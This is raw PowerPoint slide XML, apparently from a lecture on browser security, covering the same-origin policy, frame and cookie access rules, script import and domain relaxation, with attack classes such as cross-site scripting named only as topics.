          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2011364"/>
            <a:ext cx="4040188" cy="3951287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mtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Principals: Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Discretionary access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Root exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Text Placeholder 7" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321426" y="1371601"/>
            <a:ext cx="4041775" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Content Placeholder 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321426" y="2011364"/>
            <a:ext cx="4041775" cy="3951287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 smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Document object model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principals: “Origins”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cache history attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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37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9300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Policy Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771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838200" y="1006119"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safe to visit an evil web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safe to visit two pages at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	distinguishes them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allow safe delegation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32772" name="Picture 3" descr="a.com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7100" y="1250594"/>
            <a:ext cx="18542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 descr="a.com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3123844"/>
            <a:ext cx="18542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4" descr="b.com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04200" y="3123844"/>
            <a:ext cx="18542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6" descr="ifram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27900" y="4590694"/>
            <a:ext cx="18542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70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1085491"/>
            <a:ext cx="87439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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2816"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web vs System vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Content Placeholder 1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2133600" y="4971691"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decline in % web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> since 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>49% in 2010 -&gt; 37% in 2011.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Big decline in SQL Injection vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5386388" y="2011364"/>
            <a:ext cx="178276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XSS peak</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22534" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4975226" y="2217739"/>
            <a:ext cx="411163" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="lg" len="med"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ectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1447800"/>
            <a:ext cx="403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592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Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Browser security mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Content Placeholder 24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1981200" y="4465638"/>
            <a:ext cx="8229600" cy="193516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Each frame of a page has an origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Origin = protocol://host:port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Frame can access its own origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Network access, Read/write DOM, Storage (cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Frame cannot access data associated with a different origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="1447800"/>
            <a:ext cx="3657600" cy="2667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2147483647 h 21600"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T9" fmla="*/ 0 h 21600"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 21600"/>
              <a:gd name="T12" fmla="*/ 0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4445 w 21600"/>
              <a:gd name="T25" fmla="*/ 1858 h 21600"/>
              <a:gd name="T26" fmla="*/ 17311 w 21600"/>
              <a:gd name="T27" fmla="*/ 12323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71800" y="1676401"/>
            <a:ext cx="99060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6248400" y="1312713"/>
            <a:ext cx="990600" cy="110490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" name="Can 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6264349" y="2733488"/>
            <a:ext cx="990600" cy="110490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" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12877800" y="2876730"/>
            <a:ext cx="762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38600" y="1676401"/>
            <a:ext cx="990600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305300" y="2057401"/>
            <a:ext cx="49530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  <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/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4876800" y="2815540"/>
            <a:ext cx="1387549" cy="470398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 flipV="1">
            <a:off x="4762500" y="1865163"/>
            <a:ext cx="1501849" cy="317500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334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Components of browser security policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131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Frame-Frame relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>canScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A,B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>canNavigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A,B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can Frame A change the origin of content for Frame B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frame-principal relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>readCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A,S), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>writeCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A,S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can Frame A read/write cookies from site S?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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667000" y="5368381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https://code.google.com/p/browsersec/wiki/Part1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>      https://code.google.com/p/browsersec/wiki/Part2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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42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import excluded from SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819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2133600" y="1447800"/>
            <a:ext cx="7772400" cy="41148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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=https://seal.verisign.com/getseal?host_name=a.com&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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1900" dirty="0"/>
              <a:t>Script has privileges of imported page, NOT source server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Can script other pages in this origin, load more scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Other forms of importing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4" descr="a.com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2673350"/>
            <a:ext cx="3759200" cy="235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6750" y="3359150"/>
            <a:ext cx="10795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6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8362951" y="3522664"/>
            <a:ext cx="1146175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400" i="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>VeriSign</a:t>
            </a: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rot="10800000" flipH="1" flipV="1">
            <a:off x="6826250" y="3798888"/>
            <a:ext cx="1739900" cy="315912"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="54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6950" y="3586163"/>
            <a:ext cx="812800" cy="81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algn="ctr" rotWithShape="0">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effec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62950" y="3852864"/>
            <a:ext cx="1041400" cy="6492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4826" name="Picture 10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39200" y="5107231"/>
            <a:ext cx="10414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7" name="Picture 20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162801" y="5107231"/>
            <a:ext cx="858837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9" name="Picture 13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77201" y="5194543"/>
            <a:ext cx="715963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1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Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Domain Relaxation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Content Placeholder 24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2133600" y="1828800"/>
            <a:ext cx="7772400" cy="41148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Origin: scheme, host, (port), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hasSetDomain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.domain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166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2743200"/>
            <a:ext cx="2819400" cy="1722438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round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en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr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54376" y="1960563"/>
            <a:ext cx="936625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0325" y="2976563"/>
            <a:ext cx="11430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66919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3242714">
            <a:off x="4031457" y="2634457"/>
            <a:ext cx="1482725" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37719"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901"/>
            </a:srgbClr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en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36872" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="1581151"/>
            <a:ext cx="2497138" cy="3397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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36873" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4589464" y="4060825"/>
            <a:ext cx="2497137" cy="338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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3471863"/>
            <a:ext cx="2057400" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
